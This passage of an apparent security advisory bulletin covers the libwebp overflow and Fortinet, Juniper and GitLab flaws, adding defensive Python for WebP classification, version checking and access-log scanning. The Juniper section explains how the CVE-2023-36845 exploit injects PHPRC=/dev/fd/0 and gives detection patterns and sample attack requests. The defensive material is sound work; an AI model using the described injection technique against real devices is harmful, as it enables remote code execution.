Because libwebp is embedded far beyond browsers, the vulnerability also affects applications such as Affinity, GIMP, Inkscape, LibreOffice, Telegram, numerous Android apps, cross-platform apps built with Flutter, and applications built on the Electron framework. The overflow lies in the lossless (VP8L) decoder's handling of Huffman coding tables: a malicious image makes the decoder write past the end of a heap buffer, so any process that decodes untrusted WebP data with an unpatched libwebp is exposed.
Several major browser providers, including Google, Mozilla, Brave, Microsoft, and Tor, have addressed this vulnerability by rolling out security patches. Users of these browsers are urged to update to the latest versions to protect their systems.
For other affected applications where patches may not yet be available, users are advised to exercise caution when using the application or consider temporarily discontinuing its use. Regularly monitoring updates and advisories from software providers is essential to stay informed about the availability of patches.
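While unpatched applications remain in use, a gateway or mail filter can at least tell which WebP files exercise the lossless decoder, which is where the overflow lives, and quarantine or re-encode those rather than every image. The container parser below is an added example written for this page, not code from libwebp or from any vendor; it reads only the RIFF chunk layout (it never decodes pixel data, so it cannot tell a malicious image from a benign one), and the sample files are constructed with placeholder payloads that are not valid images.

```python
import struct


def parse_webp_chunks(data):
    """Walk the RIFF container and return [(fourcc, payload)], validating every length."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WEBP":
        raise ValueError("not a RIFF/WEBP container")
    riff_size = struct.unpack_from("<I", data, 4)[0]      # bytes following the 8-byte RIFF header
    end = 8 + riff_size
    if end > len(data):
        raise ValueError("RIFF size exceeds file length")
    chunks, off = [], 12
    while off + 8 <= end:
        fourcc = data[off:off + 4]
        size = struct.unpack_from("<I", data, off + 4)[0]
        if off + 8 + size > end:
            raise ValueError(f"chunk {fourcc!r} overruns container")
        chunks.append((fourcc, data[off + 8:off + 8 + size]))
        off += 8 + size + (size & 1)          # chunk payloads are padded to even length
    return chunks


def classify(data):
    """'lossy', 'lossless' or 'lossy+lossless-alpha': which decoder paths the file exercises."""
    chunks = parse_webp_chunks(data)
    kinds = {fourcc for fourcc, _ in chunks}
    for fourcc, payload in chunks:
        if fourcc == b"VP8L" and (not payload or payload[0] != 0x2F):
            raise ValueError("VP8L chunk lacks the 0x2F signature byte")
    if b"VP8L" in kinds:
        return "lossless"
    if b"VP8 " in kinds:
        # ALPH compression method 1 (low two bits of the first byte) is lossless-coded alpha,
        # which goes through the same VP8L Huffman code as a fully lossless image.
        for fourcc, payload in chunks:
            if fourcc == b"ALPH" and payload and (payload[0] & 0x03) == 1:
                return "lossy+lossless-alpha"
        return "lossy"
    raise ValueError("no image bitstream chunk (VP8/VP8L) found")


def build_webp(chunks):
    """Assemble a RIFF/WEBP file from (fourcc, payload) pairs (constructed test input, not a real image)."""
    body = b"WEBP"
    for fourcc, payload in chunks:
        body += fourcc + struct.pack("<I", len(payload)) + payload
        if len(payload) & 1:
            body += b"\x00"
    return b"RIFF" + struct.pack("<I", len(body)) + body


# Constructed samples: payloads are placeholders that exercise the container parser only.
LOSSY = build_webp([(b"VP8 ", b"\x00" * 10)])
LOSSLESS = build_webp([(b"VP8L", b"\x2f" + b"\x00" * 9)])
EXTENDED = build_webp([(b"VP8X", b"\x10" + b"\x00" * 9),   # 0x10 = alpha flag in the VP8X header
                       (b"ALPH", b"\x01" + b"\x00" * 4),    # compression method 1 = lossless alpha
                       (b"VP8 ", b"\x00" * 10)])

if __name__ == "__main__":
    for name, sample in (("lossy", LOSSY), ("lossless", LOSSLESS), ("extended", EXTENDED)):
        print(name, "->", classify(sample))
```

Gating on container type is a stopgap, not a fix: the only real remedy is a patched libwebp in every application that decodes images, including the Electron and Flutter builds that bundle their own copy.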
Access Point recommends the following:
- Update Browsers: Users of impacted web browsers should immediately update them to the latest versions that include patches for the vulnerability.
- Check Application Updates: Users of affected applications should check for and apply available security updates. If patches are not yet available, exercise caution or consider temporary discontinuation of the application's use.
- Stay Informed: Regularly monitor updates and advisories from software providers to stay informed about the availability of patches and security recommendations.
Fortinet Patches High-Severity Vulnerabilities in FortiOS, FortiProxy, FortiWeb Products
Analysis: Fortinet has released patches for a high-severity cross-site scripting (XSS) vulnerability affecting multiple versions of FortiOS and FortiProxy. The vulnerability, designated CVE-2023-29183 with a CVSS score of 7.3, can allow an authenticated attacker to trigger execution of malicious JavaScript code through crafted guest management settings. The flaw, reported by the Fortinet CSE team, is present in FortiProxy versions 7.0.x and 7.2.x and in FortiOS versions from 6.2.x through 7.4.x.
Fortinet has issued updates for these versions to correct the problem. It has also addressed a significant vulnerability in FortiWeb, its web application firewall and API protection product. That flaw, CVE-2023-34984 with a CVSS score of 7.1, can allow threat actors to bypass XSS and CSRF protection mechanisms and affects FortiWeb versions 6.3, 6.4, 7.0.x, and 7.2.x; the fix is shipped in FortiWeb 7.0.7 and 7.2.2. Fortinet has not reported any real-world exploitation of these vulnerabilities, but earlier security issues in Fortinet devices have been used by attackers to infiltrate corporate networks. Given their potential severity, the US Cybersecurity and Infrastructure Security Agency (CISA) has alerted organizations that cybercriminals could exploit these vulnerabilities to take control of affected systems.
Access Point recommends the following:
- Check for Updates: We strongly encourage administrators to review Fortinet's official advisories and promptly apply the relevant security patches.
12,000 Juniper SRX Firewalls and EX Switches Vulnerable to CVE-2023-36845
Analysis: Researchers have identified approximately 12,000 internet-exposed Juniper SRX firewalls and EX switches that remain vulnerable to a remote code execution chain built around CVE-2023-36845. In mid-August, Juniper addressed this and three other medium-severity vulnerabilities (CVE-2023-36844, CVE-2023-36846, and CVE-2023-36847) in the J-Web component of Junos OS on SRX Series and EX Series devices. Juniper's advisory warns that the flaws can be chained to achieve remote code execution: two of them let an unauthenticated attacker upload arbitrary files via J-Web, and the other two let an attacker modify PHP environment variables.
In August, security researchers published proof-of-concept exploit code showing how the chain works on Juniper SRX firewalls: first, the pre-authentication upload vulnerability (CVE-2023-36846) is used to upload a PHP file, then CVE-2023-36845 is used to overwrite a specific environment variable so that the uploaded PHP file is executed. The researchers emphasized the severity of this combination, given the central role Junos OS devices play in the networks they protect.
VulnCheck later developed an alternative exploit for CVE-2023-36845 alone. It writes no file to disk, needs only a single cURL request, and also works against older firmware. It relies on how the Appweb web server on Juniper firewalls hands request data to CGI scripts: the attacker sets the PHPRC environment variable to /dev/fd/0, so PHP reads its configuration from the request body on standard input, and that attacker-supplied configuration in turn makes PHP execute code carried in the same request.
The 12,000 figure comes from Shodan: VulnCheck found roughly 15,000 Juniper devices with internet-facing J-Web interfaces, of which around 80% were still running vulnerable versions. Given the critical role of firewalls in network security, unpatched Juniper devices are attractive targets for advanced persistent threats (APTs).
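Both public exploits reach J-Web over plain HTTP requests, so the web server's access log is the place to look for attempts, patched or not. The scanner below is an added example written for this page, not code from VulnCheck, watchTowr or Juniper; the log lines are constructed in Apache combined format (J-Web's real log format may differ), and the environment-variable name PHPRC and the /dev/fd/0 value are taken from the public exploit write-ups rather than stated on this page.

```python
import re
from urllib.parse import unquote, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Names an attacker would try to push into the CGI environment through the query string, and the
# stdin trick from VulnCheck's single-request exploit (PHPRC=/dev/fd/0).
SUSPICIOUS_PARAMS = {"phprc", "ld_preload", "ld_library_path", "auto_prepend_file", "auto_append_file"}
SUSPICIOUS_VALUES = ("/dev/fd/", "/proc/self/fd/", "/dev/stdin")


def inspect(line):
    """Return a finding for one access-log line, or None if nothing looks like env-var injection."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    target = m.group("target")
    reasons = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name, value = unquote(name).strip(), unquote(value)
        if name.lower() in SUSPICIOUS_PARAMS:
            reasons.append(f"environment variable name in query: {name}")
        if any(v in value for v in SUSPICIOUS_VALUES):
            reasons.append(f"file-descriptor path in query value: {value}")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "target": target,
            "status": m.group("status"), "reasons": reasons}


def scan(lines):
    return [finding for finding in map(inspect, lines) if finding]


# Constructed access-log lines; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.9 - - [17/Aug/2023:10:01:12 +0000] "POST /webauth_operation.php?PHPRC=/dev/fd/0 HTTP/1.1" 200 512',
    '203.0.113.9 - - [17/Aug/2023:10:01:14 +0000] "GET /?PHPRC=%2Fdev%2Ffd%2F0 HTTP/1.1" 200 1024',
    '198.51.100.4 - - [17/Aug/2023:10:05:00 +0000] "GET /login HTTP/1.1" 200 2048',
    '198.51.100.4 - - [17/Aug/2023:10:05:03 +0000] "POST /webauth_operation.php HTTP/1.1" 200 300',
    '198.51.100.4 - - [17/Aug/2023:10:06:10 +0000] "GET /?page=dashboard HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["target"], finding["reasons"])
```

A hit with a 200 response on an unpatched device should be treated as a compromise, not an attempt. Independently of patching, J-Web should not be reachable from the internet at all; restrict it to the management network.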
Access Point recommends the following:
- Immediate Patching: Promptly apply the necessary security patches provided by Juniper for the identified vulnerabilities, especially CVE-2023-36845, to prevent potential exploitation.
- Continuous Monitoring: Implement continuous monitoring of your Juniper devices for any signs of system compromise or suspicious activities.
GitLab urges users to install security updates for critical pipeline flaw
Analysis: GitLab, a widely-used web-based open-source software project management and work tracking platform, has issued security updates to address a critical vulnerability identified as CVE-2023-4998, with a CVSS v3.1 score of 9.6. This vulnerability impacts both GitLab Community Edition (CE) and Enterprise Edition (EE) versions 13.12 through 16.2.7, as well as versions 16.3 through 16.3.4. The flaw, discovered by security researcher Johan Carlsson, enables attackers to impersonate users and execute pipelines on their behalf through scheduled security scan policies.
This vulnerability represents a more severe bypass of an earlier medium-severity issue, CVE-2023-3932, which was resolved in August. When exploited, attackers can gain access to sensitive information, use the victim's permissions to execute code, alter data, or initiate specific events within GitLab. Given GitLab's critical role in code management, exploiting this vulnerability could lead to the theft of intellectual property, data breaches, supply chain attacks, and other significant threats.
GitLab has strongly urged users to promptly update their software to the fixed versions, which are GitLab Community Edition and Enterprise Edition 16.3.4 and 16.2.7. As a preventive measure, users operating on versions earlier than 16.2 should take action immediately, as these versions have not been patched.
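Two affected ranges with different fixed releases, plus a floor below which no backport exists, is exactly the kind of rule that gets misread in a spreadsheet. The checker below encodes the ranges as stated above (13.12 up to but not including 16.2.7; 16.3 up to but not including 16.3.4) and is an added example written for this page, not GitLab's own tooling; the treatment of versions below 13.12 as "outside the stated range, upgrade anyway" is an editorial choice.

```python
# Affected ranges as stated in the advisory: [first affected, first fixed) per release series.
AFFECTED_RANGES = [
    ((13, 12, 0), (16, 2, 7)),   # 13.12 up to but not including 16.2.7
    ((16, 3, 0), (16, 3, 4)),    # 16.3 up to but not including 16.3.4
]
BACKPORT_FLOOR = (16, 2, 0)      # minor series older than 16.2 received no fix
OLDEST_FIX = (16, 2, 7)


def parse_version(text):
    """'16.3.4-ee' or '16.2' -> (16, 3, 4) / (16, 2, 0)."""
    core = text.strip().split("-")[0]
    parts = [int(p) for p in core.split(".")]
    if not 2 <= len(parts) <= 3 or any(p < 0 for p in parts):
        raise ValueError(f"unrecognised version: {text!r}")
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def fmt(version):
    return ".".join(str(p) for p in version)


def assess(text):
    """Classify an installed GitLab version against the advisory and name the upgrade target."""
    v = parse_version(text)
    for first_affected, fixed in AFFECTED_RANGES:
        if first_affected <= v < fixed:
            if v < BACKPORT_FLOOR:
                note = (f"the {v[0]}.{v[1]} series received no patch; "
                        f"upgrade across series to {fmt(OLDEST_FIX)} or a later fixed release")
                target = OLDEST_FIX
            else:
                note, target = f"upgrade to {fmt(fixed)}", fixed
            return {"version": fmt(v), "status": "vulnerable", "upgrade_to": fmt(target), "note": note}
    if v < AFFECTED_RANGES[0][0]:
        return {"version": fmt(v), "status": "unknown", "upgrade_to": fmt(OLDEST_FIX),
                "note": "below the stated affected range and long unsupported; upgrade regardless"}
    return {"version": fmt(v), "status": "patched", "upgrade_to": None,
            "note": "at or above a fixed release"}


if __name__ == "__main__":
    for sample in ("16.1.4", "16.2.5-ee", "16.3.2", "16.3.4", "16.2.7"):
        print(assess(sample))
```

Run it against the version string from the admin area or the `/api/v4/version` endpoint of each instance, including self-managed runners' hosts that are easy to forget.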
Access Point recommends the following:
- Apply Security Updates: Promptly update your GitLab software to the fixed versions, specifically GitLab Community Edition and Enterprise Edition 16.3.4 and 16.2.7, to mitigate the risk associated with CVE-2023-4998.
- Immediate Action for Unpatched Versions: If you are using GitLab versions earlier than 16.2 and have not applied patches, take immediate action to protect your system from potential exploitation.
- Source Updates from Official Channels: Ensure that you source updates directly from GitLab or access GitLab Runner packages from the platform's official webpage to guarantee their authenticity and security.
- Mitigate Feature Interaction: If you cannot upgrade immediately and use both "CI/CD pipeline triggers" and "Security policies", do not keep both enabled at the same time until the patched release is installed.